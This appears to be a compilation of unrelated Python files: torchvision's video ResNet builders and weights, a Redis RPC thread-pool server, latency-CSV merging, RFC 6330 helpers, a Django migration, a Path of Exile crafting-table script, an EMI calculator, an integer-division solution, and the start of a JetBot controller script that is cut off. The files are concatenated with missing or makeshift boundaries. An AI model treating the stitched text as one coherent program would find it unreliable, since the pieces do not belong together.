                nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm3d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)
        if zero_init_residual:
            # Zeroing the last BN makes each bottleneck start as an identity
            # mapping, which can ease optimisation of deep nets.
            for m in self.modules():
                if isinstance(m, Bottleneck):
                    nn.init.constant_(m.bn3.weight, 0) # type: ignore[union-attr, arg-type]
    def forward(self, x: Tensor) -> Tensor:
        x = self.stem(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        # Flatten the layer to fc
        x = x.flatten(1)
        x = self.fc(x)
        return x
    def _make_layer(
        self,
        block: Type[Union[BasicBlock, Bottleneck]],
        conv_builder: Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]],
        planes: int,
        blocks: int,
        stride: int = 1,
    ) -> nn.Sequential:
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            # The residual branch needs a 1x1x1 projection whenever the main
            # path changes shape or channel count.
            ds_stride = conv_builder.get_downsample_stride(stride)
            downsample = nn.Sequential(
                nn.Conv3d(self.inplanes, planes * block.expansion, kernel_size=1, stride=ds_stride, bias=False),
                nn.BatchNorm3d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes, conv_builder))
        return nn.Sequential(*layers)
def _video_resnet(
    block: Type[Union[BasicBlock, Bottleneck]],
    conv_makers: Sequence[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]],
    layers: List[int],
    stem: Callable[..., nn.Module],
    weights: Optional[WeightsEnum],
    progress: bool,
    **kwargs: Any,
) -> VideoResNet:
    """Assemble a :class:`VideoResNet` and optionally load pretrained *weights*."""
    pretrained = weights is not None
    if pretrained:
        # A checkpoint fixes the classifier width to its category count.
        _ovewrite_named_param(kwargs, "num_classes", len(weights.meta["categories"]))
    model = VideoResNet(block, conv_makers, layers, stem, **kwargs)
    if pretrained:
        state = weights.get_state_dict(progress=progress, check_hash=True)
        model.load_state_dict(state)
    return model
# Metadata fields shared by all three weight entries below; each entry adds
# its own num_params / metrics / file size on top.
_COMMON_META = {
    "min_size": (1, 1),
    "categories": _KINETICS400_CATEGORIES,
    "recipe": "https://github.com/pytorch/vision/tree/main/references/video_classification",
    "_docs": (
        "The weights reproduce closely the accuracy of the paper. The accuracies are estimated on video-level "
        "with parameters `frame_rate=15`, `clips_per_video=5`, and `clip_len=16`."
    ),
}
class R3D_18_Weights(WeightsEnum):
    """Pretrained checkpoints for ``r3d_18``, trained on Kinetics-400."""
    KINETICS400_V1 = Weights(
        url="https://download.pytorch.org/models/r3d_18-b3b3357e.pth",
        transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
        meta={
            **_COMMON_META,
            "num_params": 33371472,
            "_metrics": {
                "Kinetics-400": {
                    "acc@1": 63.200,
                    "acc@5": 83.479,
                }
            },
            "_ops": 40.697,
            "_file_size": 127.359,
        },
    )
    DEFAULT = KINETICS400_V1
class MC3_18_Weights(WeightsEnum):
    """Pretrained checkpoints for ``mc3_18``, trained on Kinetics-400."""
    KINETICS400_V1 = Weights(
        url="https://download.pytorch.org/models/mc3_18-a90a0ba3.pth",
        transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
        meta={
            **_COMMON_META,
            "num_params": 11695440,
            "_metrics": {
                "Kinetics-400": {
                    "acc@1": 63.960,
                    "acc@5": 84.130,
                }
            },
            "_ops": 43.343,
            "_file_size": 44.672,
        },
    )
    DEFAULT = KINETICS400_V1
class R2Plus1D_18_Weights(WeightsEnum):
    """Pretrained checkpoints for ``r2plus1d_18``, trained on Kinetics-400."""
    KINETICS400_V1 = Weights(
        url="https://download.pytorch.org/models/r2plus1d_18-91a641e6.pth",
        transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
        meta={
            **_COMMON_META,
            "num_params": 31505325,
            "_metrics": {
                "Kinetics-400": {
                    "acc@1": 67.463,
                    "acc@5": 86.175,
                }
            },
            "_ops": 40.519,
            "_file_size": 120.318,
        },
    )
    DEFAULT = KINETICS400_V1
@register_model()
@handle_legacy_interface(weights=("pretrained", R3D_18_Weights.KINETICS400_V1))
def r3d_18(*, weights: Optional[R3D_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
    """Construct 18 layer Resnet3D model.
    .. betastatus:: video module
    Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
    Args:
        weights (:class:`~torchvision.models.video.R3D_18_Weights`, optional): The
            pretrained weights to use. See
            :class:`~torchvision.models.video.R3D_18_Weights`
            below for more details, and possible values. By default, no
            pre-trained weights are used.
        progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
        **kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
            Please refer to the `source code
            <https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
            for more details about this class.
    .. autoclass:: torchvision.models.video.R3D_18_Weights
        :members:
    """
    weights = R3D_18_Weights.verify(weights)
    # 18-layer config: BasicBlock with full 3D convs in all four stages.
    return _video_resnet(
        BasicBlock,
        [Conv3DSimple] * 4,
        [2, 2, 2, 2],
        BasicStem,
        weights,
        progress,
        **kwargs,
    )
@register_model()
@handle_legacy_interface(weights=("pretrained", MC3_18_Weights.KINETICS400_V1))
def mc3_18(*, weights: Optional[MC3_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
    """Construct 18 layer Mixed Convolution network as in
    .. betastatus:: video module
    Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
    Args:
        weights (:class:`~torchvision.models.video.MC3_18_Weights`, optional): The
            pretrained weights to use. See
            :class:`~torchvision.models.video.MC3_18_Weights`
            below for more details, and possible values. By default, no
            pre-trained weights are used.
        progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
        **kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
            Please refer to the `source code
            <https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
            for more details about this class.
    .. autoclass:: torchvision.models.video.MC3_18_Weights
        :members:
    """
    weights = MC3_18_Weights.verify(weights)
    # "Mixed" = one full-3D stage followed by three spatial-only stages.
    return _video_resnet(
        BasicBlock,
        [Conv3DSimple] + [Conv3DNoTemporal] * 3,  # type: ignore[list-item]
        [2, 2, 2, 2],
        BasicStem,
        weights,
        progress,
        **kwargs,
    )
@register_model()
@handle_legacy_interface(weights=("pretrained", R2Plus1D_18_Weights.KINETICS400_V1))
def r2plus1d_18(*, weights: Optional[R2Plus1D_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
    """Construct 18 layer deep R(2+1)D network as in
    .. betastatus:: video module
    Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
    Args:
        weights (:class:`~torchvision.models.video.R2Plus1D_18_Weights`, optional): The
            pretrained weights to use. See
            :class:`~torchvision.models.video.R2Plus1D_18_Weights`
            below for more details, and possible values. By default, no
            pre-trained weights are used.
        progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
        **kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
            Please refer to the `source code
            <https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
            for more details about this class.
    .. autoclass:: torchvision.models.video.R2Plus1D_18_Weights
        :members:
    """
    weights = R2Plus1D_18_Weights.verify(weights)
    # Factorised (2+1)D convolutions in every stage, with the dedicated stem.
    return _video_resnet(
        BasicBlock,
        [Conv2Plus1D] * 4,
        [2, 2, 2, 2],
        R2Plus1dStem,
        weights,
        progress,
        **kwargs,
    )
# The dictionary below is internal implementation detail and will be removed in v0.15
from .._utils import _ModelURLs
# Legacy name -> checkpoint URL mapping kept for backward compatibility;
# _ModelURLs warns on access so callers migrate to the Weights enums.
model_urls = _ModelURLs(
    {
        "r3d_18": R3D_18_Weights.KINETICS400_V1.url,
        "mc3_18": MC3_18_Weights.KINETICS400_V1.url,
        "r2plus1d_18": R2Plus1D_18_Weights.KINETICS400_V1.url,
    }
)
|
# @Time : 2018-10-24
# @Author : zxh
from zutils.zrpc.zmq.redismq import RedisMQ
import traceback
import time
import threading
class AbstractServer:
    """Base shape for RPC server instances consumed by ThreadpoolServer.

    Subclasses implement handler methods (e.g. ``handle1(self, task)``
    returning a result dict) and describe them via ``requests_map()``:
    each entry maps a task name to ``{'func': handler, 'max': queue size}``.
    """

    def requests_map(self):
        # Placeholder illustrating the expected structure; 'func' would
        # normally be a bound handler such as self.handle1.
        handlers = {
            'handle1': {
                'func': 'xxx',
                'max': 10,
            },
        }
        return handlers
class ThreadpoolServer:
    """Consumes tasks from a RedisMQ queue and dispatches them to handlers.

    Runs one or more worker threads plus a heartbeat thread that keeps
    re-publishing each queue's max size (a TTL-style registration refresh).
    ``logger`` is a zero-argument callable returning the actual logger.
    """
    def __init__(self, register_address, server_instance_list, logger, protocol, thread_num=1):
        self.server_instance_list = server_instance_list
        self.logger = logger
        self.requests_map = dict()
        self.protocol = protocol
        self.thread_num = thread_num
        self.register_address = register_address
        self.task_names = list()
        self.max_queue_list = list()
        # Flatten every instance's task map, refusing duplicate task names.
        for server_instance in server_instance_list:
            name_func_dict = server_instance.requests_map()
            for task_name in name_func_dict:
                if self.requests_map.get(task_name) is not None:
                    raise Exception('task_name ' + task_name + ' is not only')
                self.requests_map[task_name] = name_func_dict[task_name]['func']
                self.task_names.append(task_name)
                self.max_queue_list.append(name_func_dict[task_name]['max'])
    def work_thread(self):
        """Blocking consumer loop: pop a request, run its handler, reply."""
        rmq = RedisMQ(self.register_address, 30)
        while True:
            try:
                request = rmq.pop(self.task_names, self.protocol, False)
                if request is None:
                    self.logger().info('free')
                    continue
                try:
                    result = self.requests_map[request.task_name](request.task)
                    request.response_succ(result)
                except Exception as e:
                    # Handler failures are reported back to the caller;
                    # they do not kill the worker.
                    request.response_error(str(e))
            except:
                # Connection-level failure: log and retry after a pause.
                self.logger().error('%s' % traceback.format_exc())
                time.sleep(1)
    def heartbeat_thread(self):
        """Re-register queue size limits every 15 seconds."""
        rmq = RedisMQ(self.register_address, 30)
        while True:
            try:
                for task_name, max_size in zip(self.task_names, self.max_queue_list):
                    rmq.set_queue_maxsize(task_name, max_size, 30)
            except:
                self.logger().error('%s' % traceback.format_exc())
                time.sleep(1)
            time.sleep(15)
    def start(self):
        """Start heartbeat plus workers; never returns."""
        heartbeat = threading.Thread(target=self.heartbeat_thread)
        heartbeat.start()
        if self.thread_num == 1:
            # Single-worker mode runs in the calling thread.
            self.work_thread()
        else:
            work_thread_list = list()
            for i in range(self.thread_num):
                t = threading.Thread(target=self.work_thread)
                work_thread_list.append(t)
                t.start()
            # Keep the main thread alive while workers run.
            while True:
                time.sleep(5)
|
#!/usr/bin/env python
import sys, csv, glob, re
def build_latencies(stats_arr, filename):
    """Merge one latency CSV into the running per-window statistics.

    Each data row holds: elapsed, window, n, min, mean, median, 95th, 99th,
    99.9th, max, errors.  Counts (n, errors) are summed across files,
    min/max are combined, and the remaining columns are averaged pairwise
    with the already-accumulated value.  Returns the (mutated) ``stats_arr``.

    Fixes for Python 3: open in text mode (csv.reader needs str rows;
    'rb' raised TypeError), use ``next(reader)`` instead of the removed
    ``reader.next()``, and materialise the lazy ``map`` so the row can be
    unpacked/sliced.
    """
    i = 0
    with open(filename, 'r', newline='') as summary_file:
        reader = csv.reader(summary_file)
        next(reader)  # skip header line
        for row in reader:
            vals = [float(col.strip()) for col in row]
            elapsed, window, n, minimum, mean, median, nine5, nine9, nine9_9, maximum, errors = vals[:11]
            if len(stats_arr) <= i:
                # First file contributing this window: take the row as-is.
                stats_arr.append([elapsed, window, n, minimum, mean, median, nine5, nine9, nine9_9, maximum, errors])
            else:
                stats_arr[i][0] = (stats_arr[i][0] + float(elapsed)) / 2
                stats_arr[i][1] = (stats_arr[i][1] + window) / 2
                stats_arr[i][2] = int(stats_arr[i][2] + n)
                stats_arr[i][3] = int(min(stats_arr[i][3], minimum))
                stats_arr[i][4] = (stats_arr[i][4] + mean) / 2
                stats_arr[i][5] = int((stats_arr[i][5] + median) / 2)
                stats_arr[i][6] = int((stats_arr[i][6] + nine5) / 2)
                stats_arr[i][7] = int((stats_arr[i][7] + nine9) / 2)
                stats_arr[i][8] = int((stats_arr[i][8] + nine9_9) / 2)
                stats_arr[i][9] = int(max(stats_arr[i][9], maximum))
                stats_arr[i][10] = int(stats_arr[i][10] + errors)
            i += 1
    return stats_arr
def build_summary(stats_arr, filename):
    """Merge one run-summary CSV into the accumulated statistics.

    Each data row holds: elapsed, window, total, successful, failed.
    The three counts are summed across files; elapsed and window are
    averaged pairwise with the accumulated value.  Returns ``stats_arr``.

    Fixes for Python 3: text-mode open, ``next(reader)``, and a list
    comprehension instead of the lazy, unsliceable ``map`` objects.
    """
    i = 0
    with open(filename, 'r', newline='') as summary_file:
        reader = csv.reader(summary_file)
        next(reader)  # skip header line
        for row in reader:
            vals = [float(col.strip()) for col in row]
            elapsed, window, total, successful, failed = vals[:5]
            if len(stats_arr) <= i:
                stats_arr.append([elapsed, window, total, successful, failed])
            else:
                stats_arr[i][0] = (stats_arr[i][0] + float(elapsed)) / 2
                stats_arr[i][1] = (stats_arr[i][1] + window) / 2
                stats_arr[i][2] = int(stats_arr[i][2] + total)
                stats_arr[i][3] = int(stats_arr[i][3] + successful)
                stats_arr[i][4] = int(stats_arr[i][4] + failed)
            i += 1
    return stats_arr
# Merge per-run latency and summary CSVs found under <results_base_dir>/*/
# into one averaged file per latency name plus a combined summary.csv.
results_base_dir = sys.argv[1]

# Discover the distinct latency file names across all run directories.
latency_dict = {}
for latency_file in glob.glob(results_base_dir + "/*/*latencies.csv"):
    match_obj = re.match(r'(.*)\/(.*)\/(.*)', latency_file, re.M | re.I)
    if match_obj:
        latency_dict[match_obj.group(3)] = []

# Write merged latencies, one output file per distinct latency CSV name.
for latency_name in latency_dict:
    stats_arr = latency_dict[latency_name]
    for latency_file in glob.glob(results_base_dir + "/*/" + latency_name):
        stats_arr = build_latencies(stats_arr, latency_file)
    # Bug fix: the original called `f.close` without parentheses, so the
    # handles were never closed; use context managers instead.
    with open(latency_name, 'w') as f:
        f.write("elapsed, window, n, min, mean, median, 95th, 99th, 99_9th, max, errors\n")
        for row in stats_arr:
            f.write(','.join(map(str, row)) + '\n')

# Write the combined summary.
stats_arr = []
for stat_file in glob.glob(results_base_dir + "/*/summary.csv"):
    stats_arr = build_summary(stats_arr, stat_file)
with open('summary.csv', 'w') as f:
    f.write("elapsed, window, total, successful, failed\n")
    for row in stats_arr:
        f.write(','.join(map(str, row)) + '\n')
import math
import constants
import operator
from bitarray import bitarray
from octet_array import octet_array
def tuples(encoder, X):
    '''
    Generate encoding tuples as described here http://tools.ietf.org/html/rfc6330#section-5.3.5.4

    Returns (d, a, b, d1, a1, b1) for ISI X: the LT degree/offsets (d, a, b)
    and the PI (permanently inactive) degree/offsets (d1, a1, b1), derived
    from the encoder's J, W and P1 parameters.
    '''
    # Systematic-index constants A (odd) and B per RFC 6330 Tuple[K', X].
    A = 53591 + encoder.J*997
    if A%2 == 0:
        A += 1
    B = 10267*(encoder.J+1)
    y = int((B + X*A) % math.pow(2,32))
    v = random(y, 0, math.pow(2, 20))
    d = degree(v, encoder.W)
    if d is None:
        raise Exception("Error producing value d from y=%d and W=%d" % (y, encoder.W))
    a = 1 + random(y, 1, encoder.W-1)
    b = random(y, 2, encoder.W)
    # PI degree is 2 + Rand[X, 3, 2] only for low-degree (< 4) symbols.
    if d < 4:
        d1 = 2 + random(X, 3, 2)
    else:
        d1 = 2
    a1 = 1 + random(X, 4, encoder.P1-1)
    b1 = random(X, 5, encoder.P1)
    return (d, a, b, d1, a1, b1)
def random(y, i, m):
    '''
    Pseudo random numbers as described here http://tools.ietf.org/html/rfc6330#section-5.3.5.1

    Rand[y, i, m]: XOR four V-table entries selected by the four bytes of
    (y + i) at shifts 0/8/16/24, then reduce modulo m.

    Improvement: the byte extraction now uses integer shifts and masks
    instead of float math.pow / math.floor, which is clearer and has no
    float round-off exposure.  NOTE: this function shadows the stdlib
    module name `random`; kept for backward compatibility with callers.
    '''
    x0 = (y + i) & 0xFF
    x1 = ((y >> 8) + i) & 0xFF
    x2 = ((y >> 16) + i) & 0xFF
    x3 = ((y >> 24) + i) & 0xFF
    # Combine the four table lookups and reduce into [0, m).
    combined = constants.V0[x0] ^ constants.V1[x1] ^ constants.V2[x2] ^ constants.V3[x3]
    return combined % m
def degree(v, W):
    """
    Generate degree based on http://tools.ietf.org/html/rfc6330#section-5.3.5.2
    If v is out of range return None

    Fixes: ``xrange`` (Python 2 only) replaced by ``enumerate``; previously,
    if no table entry exceeded v, ``d`` stayed None and ``d < (W-2)`` raised
    a TypeError on Python 3 -- that case now falls through to W-2.
    """
    if v >= 1048576:
        return None
    f = constants.f
    for i, threshold in enumerate(f):
        if v < threshold:
            # Cap the degree at W-2 as required by the spec.
            return min(i, W - 2)
    return W - 2
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-01 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Album model rework: rename cover field, drop `feature`, add manual
    ordering, and make `release_date` auto-updating."""
    dependencies = [
        ('application', '0004_remove_album_publish_date'),
    ]
    operations = [
        migrations.RenameField(
            model_name='album',
            old_name='cover_url',
            new_name='cover_image',
        ),
        migrations.RemoveField(
            model_name='album',
            name='feature',
        ),
        migrations.AddField(
            model_name='album',
            name='m_order',
            # Manual display-ordering index; 0 keeps existing rows first.
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='album',
            name='release_date',
            # auto_now: updated on every save, not only on creation.
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
from PyPoE.poe.file import dat
from PyPoE.poe.file.ggpk import GGPKFile
from PyPoE.poe.file.translations import TranslationFileCache
from PyPoE.poe.sim import mods
import operator
def load_from_ggpk():
    """Read every relevant crafting-bench option out of the local PoE GGPK.

    Returns a list of dicts (one per bench craft) sorted by master, order
    and tier.  NOTE(review): the GGPK path is hard-coded to a Windows
    install location.
    """
    ggpk = GGPKFile()
    ggpk.read(r'C:\Games\Grinding Gear Games\Path of Exile\content.ggpk')
    ggpk.directory_build()
    r = dat.RelationalReader(path_or_ggpk=ggpk, files=['CraftingBenchOptions.dat'], read_options={'use_dat_value': False})
    tc = TranslationFileCache(path_or_ggpk=ggpk, files=['stat_descriptions.txt'], merge_with_custom_file=True)
    #
    ret = []
    for i in r['CraftingBenchOptions.dat'].row_iter():
        # if item is from prophecy, Default/plinth, niko, jun
        if i['HideoutNPCsKey'].rowid in [0, 3, 4, 5]:
            # Each field falls back through: mod translation -> recipe
            # description -> 'Default' when the row lacks a ModsKey.
            temp = {
                'name': mods.get_translation(i['ModsKey'], tc, use_placeholder=True).lines if i['ModsKey'] else [i['RecipeIds'][0]['Description']] if i['RecipeIds'] else ['Default'],
                'mod': mods.get_translation(i['ModsKey'], tc).lines if i['ModsKey'] else [i['Name']] if i['Name'] else ['Default'],
                'master': 9 if i['HideoutNPCsKey'].rowid == 0 else 1 if i['HideoutNPCsKey'].rowid == 4 else i['HideoutNPCsKey'].rowid, # ['Hideout_NPCsKey']['Name'],
                'mod_group_name': i['ModFamily'] if i['ModFamily'] else [i['RecipeIds'][0]['Description']] if i['RecipeIds'] else ['Default'],
                'order': i['Order'],
                'tier': i['Tier'],
                'cost': i['Cost_Values'],
                'currency': [j['Name'] for j in i['Cost_BaseItemTypesKeys']],
                'bases': [j['Id'] for j in i['CraftingItemClassCategoriesKeys']],
                'location': i['CraftingBenchUnlockCategoriesKey']['ObtainingDescription'] if i['CraftingBenchUnlockCategoriesKey'] is not None else i['RecipeIds'][0]['UnlockDescription'] if i['RecipeIds'] else 'Default',
                'groupid': i['CraftingBenchUnlockCategoriesKey'].rowid if i['CraftingBenchUnlockCategoriesKey'] is not None else i['RecipeIds'][0]['RecipeId'] if i['RecipeIds'] else 'default',
                'type': i['AffixType']
            }
            temp['bases'].sort()
            ret.append(temp)
    ret = sorted(ret, key=operator.itemgetter('master', 'order', 'tier'))
    return ret
# Helper function for Jun veiled names
def parse_jun(loc, type):
    """Map a Jun unlock-location string to the veiled mod's display name.

    Scans *loc* for a syndicate member's name (in declaration order) and
    returns that member's veiled-mod name; otherwise falls back to the
    generic 'Veiled' prefix or 'of the Veil' suffix depending on *type*.
    """
    # Ordered lookup: the first member name found in loc wins.
    veillookup = {
        'Gravicius Reborn': "Gravicius' Veiled",
        'Rin Yuushu': "Rin's Veiled",
        'Guff Grenn': "Guff's Veiled",
        'Vorici': "Vorici's Veiled",
        'Korell Goya': "Korell's Veiled",
        'Vagan': "Vagan's Veiled",
        'Elreon': "Elreon's Veiled",
        'Leo': "Leo's Veiled",
        'Tora': "Tora's Veiled",
        'Haku': "Haku's Veiled",
        'It That Fled': "It That Fled's Veiled",
        'Syndicate Mastermind': "Catarina's Veiled",
        'Thane Jorgin': "of Jorgin's Veil",
        'Hillock, the Blacksmith': "of Hillock's Veil",
        'Janus Perandus': "of Janus' Veil",
        'Aisling Laffrey': "of Aisling's Veil",
        'Cameria the Coldblooded': "of Cameria's Veil",
        'Riker Maloney': "of Riker's Veil",
    }
    matched = next((title for member, title in veillookup.items() if member in loc), None)
    if matched is not None:
        return matched
    return 'Veiled' if type == 'Prefix' else 'of the Veil'
# given a sorted list of dictionaries representing recipes, clean up the data for presentation
def htmlify(data):
    """Turn the sorted recipe dicts into the JS-ish `mods` table and write
    it to table_data.py.

    Groups crafts by (mod_group_name, master) within each affix section,
    merging entries that share a tier, and renders currencies/item classes
    as <span> icon markup.  Single quotes are escaped because the output is
    embedded in single-quoted JS string literals.
    """
    # For converting currencies and bases to images
    spanlookup = {
        "Orb of Alteration": 'alt',
        "Orb of Transmutation": 'transmute',
        "Orb of Alchemy": 'alch',
        "Chaos Orb": 'chaos',
        "Orb of Augmentation": 'aug',
        "Orb of Chance": 'chance',
        "Divine Orb": 'divine',
        "Exalted Orb": 'exalt',
        "Regal Orb": 'regal',
        "Glassblower's Bauble": 'bauble',
        "Vaal Orb": 'vaal',
        "Armourer's Scrap": 'scrap',
        "Blessed Orb": 'blessed',
        "Orb of Fusing": 'fuse',
        "Jeweller's Orb": 'jorb',
        "Chromatic Orb": 'chrom',
        "Orb of Scouring": 'scour',
        "Gemcutter's Prism": 'gcp',
        "Blacksmith's Whetstone": 'whetstone',
        "OneHandMelee": 'om',
        "OneHandRanged": 'or',
        "TwoHandMelee": 'tm',
        "TwoHandRanged": 'tr',
        "Amulet": 'am',
        "BodyArmour": 'bd',
        "Belt": 'be',
        "Boots": 'bo',
        "Gloves": 'gl',
        "Helmet": 'he',
        "Quiver": 'qu',
        "Ring": 'ri',
        "Shield": 'sh',
        "Flask": 'fl'
    }
    processed = {}
    groups = {}
    for mod in data:
        if mod['type'] not in processed:
            processed[mod['type']] = []
            groups[mod['type']] = []
        # Identity of a craft group: same family AND same master.
        name = (mod['mod_group_name'], mod['master'])
        if name in groups[mod['type']]:
            idx = groups[mod['type']].index(name)
        else:
            # New group: idx -1 addresses the entry appended just below.
            idx = -1
            groups[mod['type']].append(name)
            processed[mod['type']].append({
                'name': '<br>'.join(mod['name']),
                "mods": {}
            })
        if mod['tier'] in processed[mod['type']][idx]['mods']:
            # Same group+tier seen before: merge text/cost/slots/locations,
            # skipping values already present.
            processed[mod['type']][idx]['mods'][mod['tier']]['name'] += '<br><br>' + '<br>'.join(mod['mod']).replace("'", "\\'")
            cost_ = ', '.join([f'{mod["cost"][i]}<span class="{spanlookup[mod["currency"][i]]}"></span>' for i in range(len(mod['cost']))]).replace("'", "\\'")
            slots_ = ''.join([f'<span class="{spanlookup[i]}"></span>' for i in mod['bases']])
            loc_ = mod['location'].replace("'", "\\'") if mod['master'] != 5 else parse_jun(mod['location'], mod['type']).replace("'", "\\'")
            groupid_ = f"{mod['master']}-{mod['groupid']}"
            if cost_ not in processed[mod['type']][idx]['mods'][mod['tier']]['cost']:
                processed[mod['type']][idx]['mods'][mod['tier']]['cost'] += f"<br><br>{cost_}"
            if slots_ not in processed[mod['type']][idx]['mods'][mod['tier']]['slots']:
                processed[mod['type']][idx]['mods'][mod['tier']]['slots'] += f"<br><br>{slots_}"
            processed[mod['type']][idx]['mods'][mod['tier']]['slots_meta'].update(set([f'{spanlookup[i]}' for i in mod['bases']]))
            if loc_ not in processed[mod['type']][idx]['mods'][mod['tier']]['loc']:
                processed[mod['type']][idx]['mods'][mod['tier']]['loc'] += f"<br><br>{loc_}"
            if groupid_ not in processed[mod['type']][idx]['mods'][mod['tier']]['groupid']:
                processed[mod['type']][idx]['mods'][mod['tier']]['groupid'] += f" {groupid_}"
        else:
            # First craft for this group+tier: seed the entry. Master 5 (Jun)
            # gets a per-tier groupid so veiled tiers stay distinct.
            processed[mod['type']][idx]['mods'][mod['tier']] = {
                'name': '<br>'.join(mod['mod']).replace("'", "\\'"),
                'cost': ', '.join([f'{mod["cost"][i]}<span class="{spanlookup[mod["currency"][i]]}"></span>' for i in range(len(mod['cost']))]).replace("'", "\\'"),
                'slots': ''.join([f'<span class="{spanlookup[i]}"></span>' for i in mod['bases']]),
                'slots_meta': set([f'{spanlookup[i]}' for i in mod['bases']]),
                'loc': mod['location'].replace("'", "\\'") if mod['master'] != 5 else parse_jun(mod['location'], mod['type']).replace("'", "\\'"),
                'groupid': f"{mod['master']}-{mod['groupid']}" if mod['master'] != 5 else f"{mod['master']}-{mod['groupid']}-{mod['tier']}"
            }
    # Section -> mod group -> mod -> [name, cost, slot, location, groupid]
    buf = 'mods = [\n'
    for affix in ['Prefix', 'Suffix', 'Other']:
        buf += f'\t["{affix}", [\n'
        for mod in processed[affix]:
            buf += f'\t\t["{mod["name"]}", [\n'
            for m in sorted(mod['mods']):
                buf += f"\t\t\t['{mod['mods'][m]['name']}', '{mod['mods'][m]['cost']}', '{mod['mods'][m]['slots']}', \"{' '.join(mod['mods'][m]['slots_meta'])}\", '{mod['mods'][m]['loc']}', '{mod['mods'][m]['groupid']}'],\n"
            buf += '\t\t]],\n'
        buf += '\t]],\n'
    buf += ']'
    with open('table_data.py', 'w') as f:
        f.write(buf)
def main():
    """Load mod data from the game archive and render it to table_data.py."""
    data = load_from_ggpk()
    htmlify(data)
if __name__ == '__main__':
    # Script entry point (stray trailing '|' artifact removed: it was a
    # syntax error).
    main()
def emi_calculator(p, r, t):
    """Return the fixed monthly EMI (equated monthly instalment).

    Uses the standard annuity formula EMI = P*i*(1+i)^n / ((1+i)^n - 1)
    where i is the monthly interest fraction and n the number of months.

    :param p: loan principal
    :param r: annual interest rate in percent
    :param t: tenure in years
    :return: monthly instalment as a float
    """
    r = r / (12 * 100)  # annual percentage rate -> monthly fraction
    t = t * 12          # years -> number of monthly instalments
    if r == 0:
        # Zero-interest edge case: the annuity formula divides by zero,
        # but the answer is simply the principal split evenly.
        return p / t
    return (p * r * pow(1 + r, t)) / (pow(1 + r, t) - 1)
# Driver code: compute the EMI for a sample loan and print it.
# (Removed the stray trailing semicolons — they are no-ops in Python.)
principal = 500000  # loan principal
rate = 1.5          # annual interest rate, percent
time = 1            # tenure in years
emi = emi_calculator(principal, rate, time)
print("Monthly EMI is= ", emi)
|
"""
Divide two integers without using multiplication, division and mod operator.
If it is overflow, return MAX_INT.
"""
class Solution(object):
    def divide(self, dividend, divisor):
        """Integer division without *, / or % operators.

        Repeatedly subtracts exponentially growing multiples of the
        divisor.  Clamps a 32-bit overflow to 0x7fffffff.

        :type dividend: int
        :type divisor: int
        :rtype: int
        """
        same_sign = (dividend > 0) is (divisor > 0)
        remaining, base = abs(dividend), abs(divisor)
        quotient = 0
        while remaining >= base:
            multiple = 1
            chunk = base
            # Double the chunk until it no longer fits.
            while remaining >= chunk:
                quotient += multiple
                remaining -= chunk
                multiple <<= 1
                chunk <<= 1
        if quotient > 0x7fffffff:
            return 0x7fffffff if same_sign else -0x80000000
        return quotient if same_sign else -quotient
import evdev
from evdev import InputDevice, categorize, ecodes, KeyEvent
from jetbot import Robot
from jetbot import Camera
import jetbot.utils.teensyadc as teensyadc
from cv2 import imencode
import time, os, sys, math, datetime, subprocess
import pwd, grp
import signal, select
# DualShock 4 button key codes as reported by evdev.
CROSS = 305
TRIANGLE = 307
CIRCLE = 306
SQUARE = 304
L1 = 308
R1 = 309
L2 = 310
R2 = 311
L3 = 314
R3 = 315
SHARE = 312
OPTION = 313
TPAD = 317
PSHOME = 316
# Pseudo key code passed to get_snap_name() for snapshots triggered by
# axis motion rather than a button press.
OTHERCODE = 320
# Analog axis names (evdev ABS_* event codes).
LEFT_X = "ABS_X" # 0 is left
LEFT_Y = "ABS_Y" # 0 is up
RIGHT_X = "ABS_Z" # 0 is left
RIGHT_Y = "ABS_RZ" # 0 is up
L2_ANALOG = "ABS_RX" # 0 is released
R2_ANALOG = "ABS_RY" # 0 is released
DPAD_X = "ABS_HAT0X" # -1 is left
DPAD_Y = "ABS_HAT0Y" # -1 is up
# Virtual axes fed by the neural-network helper process via stdin.
NN_STEERING = "NN_STEERING"
NN_THROTTLE = "NN_THROTTLE"
# Latest raw value for every axis (sticks/triggers start at mid-scale 128,
# d-pad and NN axes at 0).
axis = {
